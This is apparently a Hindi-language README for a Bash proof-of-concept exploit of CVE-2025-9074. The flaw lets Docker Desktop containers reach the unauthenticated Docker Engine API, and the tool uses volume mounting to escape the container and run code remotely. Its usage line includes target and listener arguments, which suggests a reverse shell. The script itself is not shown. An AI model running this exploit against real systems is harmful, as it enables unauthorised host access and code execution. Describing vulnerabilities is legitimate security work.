
CVE-2025-9074 के लिए Bash-आधारित PoC शोषण जो अप्रमाणित Docker Engine API को लक्षित करता है, विशेषाधिकार प्राप्त वॉल्यूम माउंटिंग के माध्यम से कंटेनर से बचाव और दूरस्थ कोड निष्पादन प्राप्त करता है।
Docker Desktop में एक गंभीर CVE-2025-9074 कमजोरी स्थानीय रूप से चलने वाले Linux कंटेनरों को डिफ़ॉल्ट सबनेट (192.168.65.7:2375) के माध्यम से Docker Engine API से जुड़ने में सक्षम बनाती है। यह समस्या एन्हांस्ड कंटेनर आइसोलेशन (ECI) या TCP एक्सपोज़र सेटिंग्स की परवाह किए बिना बनी रहती है। CVE-2025-9074 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट कोड सार्वजनिक रूप से उपलब्ध है। यह कमजोरी होस्ट सिस्टम पर उपयोगकर्ता फ़ाइलों तक अनधिकृत पहुंच की अनुमति दे सकती है। इसलिए, जोखिम स्तर को उच्च जोखिम के रूप में रेट किया गया है।
प्रमाणीकरण के बिना उजागर Docker APIs (आमतौर पर पोर्ट 2375) का शोषण करने के लिए एक स्वतंत्र Bash स्क्रिप्ट। यह उपकरण वॉल्यूम माउंटिंग के माध्यम से कंटेनर ब्रेकआउट को स्वचालित करता है, जिससे रिमोट कोड निष्पादन संभव होता है।
curl और grep जैसी मानक उपयोगिताओं का उपयोग करके कार्यान्वित। किसी बाहरी बाइनरी या तृतीय-पक्ष टूल की आवश्यकता नहीं।chmod +x exploit.sh
./exploit.sh [TARGET_IP] [PORT] -l <listener_ip> -p <listener_port>
